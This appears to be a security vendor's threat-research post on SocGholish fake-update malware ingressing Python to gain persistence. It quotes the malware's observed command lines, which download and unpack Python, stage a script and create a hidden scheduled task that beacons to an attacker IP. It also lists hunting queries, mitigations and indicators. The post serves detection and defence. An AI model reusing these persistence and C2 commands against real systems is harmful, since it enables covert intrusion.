Freely subscribe to our NEWSLETTER

• While investigating customer detections in Q1 2024, ReliaQuest researchers identified the fake-update malware variant “SocGholish” ingressing Python—rather than Blister Loader—to establish persistence with a scheduled task, signaling an evolution in the malware’s behavior.
• In this new method, SocGholish is typically delivered via drive-by compromise that tricks users into downloading a malicious JavaScript file. The file then downloads and extracts Python from a trusted domain and creates a scheduled task to run a malicious Python script.
• This tactic will likely improve SocGholish’s defense evasion capabilities and reflects threat actors increasingly avoiding technologies that are heavily monitored by detections in endpoint security controls, such as obfuscated PowerShell scripts.
• Organizations should introduce security controls such as setting Notepad as the default application for JavaScript files, implementing application control, configuring EDR systems to identify and block threats, blocking JavaScript and VBScript from launching downloaded executable content, and conducting user education to prevent or mitigate such attacks.

Our Discovery
In Q1 2024, ReliaQuest detected suspicious JavaScript files in customer environments—including “update.js,” a common file name used by SocGholish and other fake-update malware variants. While reviewing the execution of the first-stage payload, we identified a new behavior for this malware: the ingress of Python for persistence.
The “SocGholish” malware family (aka “FakeUpdates”) is delivered via drive-by compromise. This type of attack commonly uses a compromised website with high search engine rankings that relies on social engineering to trick users into downloading a malicious JavaScript payload masquerading as a browser update. Upon execution, command-and-control (C2) is established, allowing adversaries to conduct further actions toward their objective.
ReliaQuest researchers have been tracking the SocGholish malware variant for some time: In Q1 2023, we responded to instances of SocGholish activity leading to the deployment of ransomware.
However, as defenders constantly deploy new security controls to combat threats, attackers adapt their craft in response. The discovery of SocGholish employing Python—instead of Blister Loader—for execution signals an evolution in the tactics, techniques, and procedures of threat actors utilizing this malware.

Introducing the Novel Infection Chain
After the execution of “update.js” via the Windows utility “wscript.exe,” we observed the following new behaviors:
cmd.exe" /C powershell -c "wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:\programdata\python.zip;ls c:\programdata\python.zip;Expand-Archive -LiteralPath c:\programdata\python.zip -DestinationPath c:\programdata\py3;del c:\programdata\python.zip;ls c:\programdata\py3" >> "C:\Users\AppData\Local\Temp\radBG1A6.tmp"
1. Downloads python3.12.0 as “python.zip” from the official Python Foundation repository, confirms the download, and enumerates the download directory via the “ls” command.
2. Extracts the contents of python.zip with the command “Expand-Archive –LiteralPath” to the destination path “c:\programdata\py3”.
3. Deletes the previously downloaded ZIP file, “python[.]zip”.
4. Lists the contents of “py3” with the command “ls”.
5. Redirects all of the console output, including errors to the file “ radBG1A6.tmp”.
cmd.exe" /C rename "c:\programdata\py3\rad39987.tmp" "hklib.py"
1. Renames the file “rad39987.tmp” to “hklib.py”. The temp file “rad39987.tmp”contains malicious Python code for the following command.
C:\Windows\System32\cmd.exe" /C schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\hklib.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5&schtasks /run /tn "pypi-py" >> "C:\Users\AppData\Local\Temp\radE80E1.tmp

1. Creates a scheduled task with the name “pypi-py”, overwriting any previously created tasks with the same name.
2. Executes the Python script “hklib.py” with the ingressed Python interpreter, “pythonw.exe”. This interpreter doesn’t display the console window upon execution like the standard interpreter “python.exe”. This is to keep the malicious task hidden from the user. Based on a similar file found on VirusTotal, we suspect the hklib.py script is a SOCKS5 proxy client being used to establish a C2 connection to the IP and port specified in the command arguments.
3. The arguments “-ip 92.118.112[.]208 -port 443” are passed as arguments for the executing python script.
4. The task “pypi-py” is set to execute every 5 minutes and then executed immediately.
5. The console output, including any errors, is redirected to “radE80E1.tmp”.
The ingress of Python to establish persistence with a scheduled task (T1053.005) is new for SocGholish. This is likely to improve defense evasion capabilities (TA0005) compared to Python by utilizing a second–stage download from the trusted domain “python[.]org”.

Unique Behavior Identification
This is our first observation of SocGholish using Python, so we checked VirusTotal to see whether any samples exist. We used the following queries:
• Behavior_command_executions:schtasks /create /f /tn*.py
o 1 unrelated result.
• Behavior_processes:Update.js attack_technique:T1053.005
o No results for persistence with scheduled tasks.
• filename:update.js content:707974686f6e
o Hex for “python” in an update.js file.
• filename:update.js content:507974686f6e
o Hex for “Python” in an update.js file.
Based on these results, we are confident that this new behavior has not yet been shared with the security community.

What Does This Mean for Organizations?
This new finding is further evidence of the continued chess game between adversaries and defenders. Defenders are aware of the dangers of commonly known file types, such as malicious executables (.exe) or obfuscated Powershell scripts, but have little prior experience of malicious use of Python. This also means that adversaries are aware of the controls put in place and are implementing granular bypasses.

Recommendations
• Implement a group policy object to set Notepad as the default application for JavaScript files. This will prevent the execution of the initial payload.
• Implement application control to prevent applications that are not needed for users’ workflows. Restricting the usage of Powershell, wget, and Python can reduce the chance of successful execution.
• Configure Endpoint Detection and Response (EDR systems to not only identify threats but also to actively block them, thereby preventing potential breaches before they can cause harm.
• Block JavaScript or VBScript from launching downloaded executable content. Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch other malware from the Internet.
• Educate users to download browser updates from only trusted sources.
IOCs
Domains:
• oystergardens[dot]club
Hashes:
• 34b4d749924384409c12988f4c7690751f4b7f7c
IPs
• 92.118.112[.]208